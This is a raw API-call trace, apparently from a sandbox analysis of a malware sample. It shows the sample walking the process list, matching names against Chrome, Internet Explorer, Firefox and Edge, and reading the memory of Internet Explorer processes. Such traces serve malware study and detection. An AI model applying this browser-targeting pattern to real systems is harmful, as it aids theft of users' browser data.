	[0255.026] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.026] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0255.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.027] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.027] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0255.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xae14
	[0255.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.028] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0255.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.029] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0255.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.029] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0255.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.029] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.029] NtQueryInformationProcess (in: ProcessHandle=0xae14, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0255.030] ReadProcessMemory (in: hProcess=0xae14, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0255.030] ReadProcessMemory (in: hProcess=0xae14, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0255.030] ReadProcessMemory (in: hProcess=0xae14, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0255.030] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0255.030] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0255.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xae18
	[0255.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.031] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0255.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.031] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0255.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.032] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0255.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.032] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.032] NtQueryInformationProcess (in: ProcessHandle=0xae18, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0255.032] ReadProcessMemory (in: hProcess=0xae18, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0255.033] ReadProcessMemory (in: hProcess=0xae18, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0255.033] ReadProcessMemory (in: hProcess=0xae18, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0255.033] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0255.033] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0255.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xae1c
	[0255.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.034] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0255.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.034] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.034] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0255.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.035] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0255.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xae20
	[0255.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.036] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0255.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.036] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.037] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0255.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.037] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xae24
	[0255.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.038] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.039] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.039] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.039] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.040] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.040] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.041] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xae28
	[0255.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.041] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.042] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.042] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.042] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.042] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.043] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xae2c
	[0255.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.043] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.044] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.044] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.044] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.045] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0255.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xae30
	[0255.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.046] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0255.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.046] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.047] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0255.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.047] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.047] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.049] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xae34
	[0255.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.049] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.049] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.050] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.050] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.050] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.051] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xae38
	[0255.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.051] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.051] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.052] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.052] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.052] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0255.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xae3c
	[0255.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.053] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0255.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.054] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.054] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0255.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.054] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.054] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0255.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xae40
	[0255.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.055] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.056] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.056] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.056] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.056] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0255.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xae44
	[0255.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.057] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0255.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.058] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.058] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0255.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.058] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.058] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xae48
	[0255.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.059] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.060] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.060] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.060] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.061] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0255.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xae4c
	[0255.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.062] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0255.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.062] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.062] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0255.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.063] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.063] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0255.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xae50
	[0255.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.064] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.064] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.065] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.065] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.066] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0255.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xae54
	[0255.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.067] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0255.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.067] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.067] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0255.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.067] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.068] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0255.068] CloseHandle (hObject=0x4fd0) returned 1
	[0255.068] Sleep (dwMilliseconds=0x64) 
	[0255.170] GetCurrentProcessId () returned 0x110
	[0255.170] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0255.177] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0255.179] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0255.182] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0255.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xae58
	[0255.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.184] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.184] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.185] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.185] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.185] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0255.186] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xae5c
	[0255.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.186] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.187] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.187] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.187] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.187] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0255.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xae60
	[0255.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.188] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0255.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.189] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.189] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0255.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.189] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0255.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xae64
	[0255.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.190] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0255.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.191] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.191] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0255.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.191] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.191] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
